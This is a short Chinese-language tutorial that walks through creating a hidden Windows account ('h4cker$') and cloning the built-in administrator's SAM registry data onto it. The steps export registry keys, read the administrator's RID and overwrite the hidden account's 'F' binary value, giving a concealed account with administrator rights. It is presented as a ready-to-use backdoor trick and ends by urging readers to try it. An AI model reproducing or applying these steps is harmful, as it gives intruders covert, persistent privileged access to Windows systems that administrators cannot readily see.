隐藏和克隆管理员[REG]

一、得到要克隆的账号信息

1、Net user h4cker$ 123 /add

2、导出 [HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\h4cker$]

3、查看导出[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\h4cker$]里的默认值

示例

====================我是分割线===================================

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\h4cker$]

@=hex(3f0):

====================分割线结束===================================

注意: " 3f0 " 就是我们下一步需要的

4、导出[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000003F0]

以上我们要克隆的账号h4cker$ 的信息就整理完毕

二、得到正常可用的管理员信息

1、Net user administrator              '查看用户administrator信息

   Net localgroup administrator         '查看用户组administrator信息

注意: 确保被克隆账号的正常和权限（是否禁用和用户组）

2、查看[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\administrator]的默认值

示例

====================我是分割线===================================

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\administrator]

@=hex(1f4):

====================分割线结束===================================

注意: " 1f4 " 就是我们下一步需要的

3、导出 [HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4]

OK!被克隆账号的信息收集完毕~ 下面要开始"克隆"了 ^!^

三、克隆开始喽！

1、Net user h4cker$ /del    '删除账号h4cker$

2、复制

[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4]下二进制"F"的数据

   覆盖

[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000003F0]下二进制"F"的数据

并保存！

3、导入[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\h4cker$]和修改过的

[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000003F0]

4、打完收工！ 赶快试试吧~